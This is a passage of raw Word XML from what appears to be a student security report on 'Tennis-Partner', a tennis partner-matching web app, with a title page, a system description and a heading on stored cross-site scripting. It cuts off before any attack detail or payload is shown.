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E3F0EC" w14:textId="6C5376EC" w:rsidR="001703C3" w:rsidRPr="00F94EEA" w:rsidRDefault="001703C3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75123FE0" wp14:editId="6E654B9A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-619125</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6257290" cy="525780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6257290" cy="5257800"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3B8C901A" w14:textId="09EAE6AF" w:rsidR="001703C3" w:rsidRPr="001703C3" w:rsidRDefault="001703C3" w:rsidP="001703C3">
                            <w:pPr>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030551" w:rsidRDefault="00D0700A" w:rsidP="001703C3">
                            <w:pP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703C3" w:rsidRDefault="001703C3" w:rsidP="001703C3">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>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8D3367" w14:textId="77777777" w:rsidR="001703C3" w:rsidRPr="001703C3" w:rsidRDefault="001703C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טל ברעם 204001366</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="33F9C8B1" w14:textId="4F390A83" w:rsidR="001703C3" w:rsidRDefault="001703C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תומר אסטנובסקי</w:t>
                            </w:r>
                            <w:r w:rsidR="00EE7BF4">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16422237</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5A553508" w14:textId="748F5AFB" w:rsidR="003B1B63" w:rsidRPr="001703C3" w:rsidRDefault="003B1B6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אלעד אוהב ציון </w:t>
                            </w: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23FE0" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="תיבת טקסט 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:-48.75pt;margin-top:0;width:492.7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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3B8C901A" w14:textId="09EAE6AF" w:rsidR="001703C3" w:rsidRPr="001703C3" w:rsidRDefault="001703C3" w:rsidP="001703C3">
                      <w:pPr>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1703C3">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030551" w:rsidRDefault="00D0700A" w:rsidP="001703C3">
                      <w:pP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030551">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703C3" w:rsidRDefault="001703C3" w:rsidP="001703C3">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>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8D3367" w14:textId="77777777" w:rsidR="001703C3" w:rsidRPr="001703C3" w:rsidRDefault="001703C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טל ברעם 204001366</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="33F9C8B1" w14:textId="4F390A83" w:rsidR="001703C3" w:rsidRDefault="001703C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3C3">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תומר אסטנובסקי</w:t>
                      </w:r>
                      <w:r w:rsidR="00EE7BF4">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16422237</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5A553508" w14:textId="748F5AFB" w:rsidR="003B1B63" w:rsidRPr="001703C3" w:rsidRDefault="003B1B63" w:rsidP="001703C3">
                      <w:pPr>
                        <w:rPr>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sz w:val="36"/>
                          <w:szCs w:val="3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אלעד אוהב ציון </w:t>
                      </w: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anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E7A62" w14:textId="77777777" w:rsidR="001703C3" w:rsidRPr="00F94EEA" w:rsidRDefault="001703C3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C9C39E" w14:textId="77777777" w:rsidR="001703C3" w:rsidRPr="00F94EEA" w:rsidRDefault="001703C3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6238D9" w14:textId="77777777" w:rsidR="001703C3" w:rsidRPr="00F94EEA" w:rsidRDefault="001703C3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592BBC5D" w14:textId="77777777" w:rsidR="001703C3" w:rsidRPr="00F94EEA" w:rsidRDefault="001703C3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE62C53" w14:textId="77777777" w:rsidR="001703C3" w:rsidRPr="00F94EEA" w:rsidRDefault="001703C3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023F659D" w14:textId="77777777" w:rsidR="001703C3" w:rsidRPr="00F94EEA" w:rsidRDefault="001703C3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5529FC72" w14:textId="77777777" w:rsidR="001703C3" w:rsidRPr="00F94EEA" w:rsidRDefault="001703C3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C67509" w14:textId="77777777" w:rsidR="001703C3" w:rsidRPr="00F94EEA" w:rsidRDefault="001703C3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4684C006" w14:textId="77777777" w:rsidR="001703C3" w:rsidRPr="00F94EEA" w:rsidRDefault="001703C3" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6688613A" w14:textId="77777777" w:rsidR="001703C3" w:rsidRPr="00752D67" w:rsidRDefault="00D0700A" w:rsidP="00752D67">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:szCs w:val="32"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00752D67">
        <w:lastRenderedPageBreak/>
        <w:t>System's description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1906D10E" w14:textId="1E2C9691" w:rsidR="00F5660C" w:rsidRPr="00F94EEA" w:rsidRDefault="00F5660C" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tennis-Partner is a web application that is used for tennis players of all levels to find</w:t>
      </w:r>
      <w:r w:rsidR="002D416F" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> their</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tennis partner</w:t>
      </w:r>
      <w:r w:rsidR="002D416F" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and schedule games together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358EB78A" w14:textId="40994EE2" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00F5660C" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The app classifies players according to their subjective level and offers a ranking system that is based on their</w:t>
      </w:r>
      <w:r w:rsidR="002D416F" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> objective</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> scores</w:t>
      </w:r>
      <w:r w:rsidR="002D416F" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> playing with each other</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. Players can choose to publish their preferred dates for games on a public wall so that other players could join them if they wish</w:t>
      </w:r>
      <w:r w:rsidR="002D416F" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>There</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is also an option to invite other players privately</w:t>
      </w:r>
      <w:r w:rsidR="002D416F" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F23FE7A" w14:textId="77777777" w:rsidR="00F5660C" w:rsidRPr="00F94EEA" w:rsidRDefault="00F5660C" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tennis-player is an interactive platform, and its goal is to make it easier for players to find other players and enjoy the game together. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E663E3" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B92E5F0" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8C064D" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FDA70D8" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A27E324" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3741994C" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA2BB71" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FFDDF26" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4966B3BC" w14:textId="2027B450" w:rsidR="00FE0D21" w:rsidRPr="00752D67" w:rsidRDefault="00752D67" w:rsidP="00752D67">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:szCs w:val="32"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00752D67">
        <w:lastRenderedPageBreak/>
        <w:t>Table of contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040A01C0" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF1DD0C" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB9D4F9" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472C3677" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06323D30" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506218A1" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E57A92F" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640261F7" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A751E2A" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A131E82" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A860E43" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23DDDA30" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11081F9C" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1619E5C5" w14:textId="77777777" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131E2434" w14:textId="77777777" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C64E77A" w14:textId="77777777" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B797A9" w14:textId="77777777" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2C668A" w14:textId="77777777" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD83B0B" w14:textId="77777777" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B30EC80" w14:textId="77777777" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3F358F" w14:textId="77777777" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79AE4D47" w14:textId="77777777" w:rsidR="00D10E51" w:rsidRPr="00F94EEA" w:rsidRDefault="00D10E51" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509747EB" w14:textId="68819F9C" w:rsidR="00FE0D21" w:rsidRPr="00F94EEA" w:rsidRDefault="00FE0D21" w:rsidP="00544A3E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:lastRenderedPageBreak/>
        <w:t>Stored cross-site scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AED5C4" w14:textId="77777777" w:rsidR="00FE0D21" w:rsidRPr="00787602" w:rsidRDefault="00D34400" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:szCs w:val="26"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4BA06A" w14:textId="77777777" w:rsidR="00F5660C" w:rsidRPr="00F94EEA" w:rsidRDefault="00F5660C" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The team found </w:t>
      </w:r>
      <w:r w:rsidR="00AD249B" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>that the app is vulnerable to stored-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD249B" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD249B" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
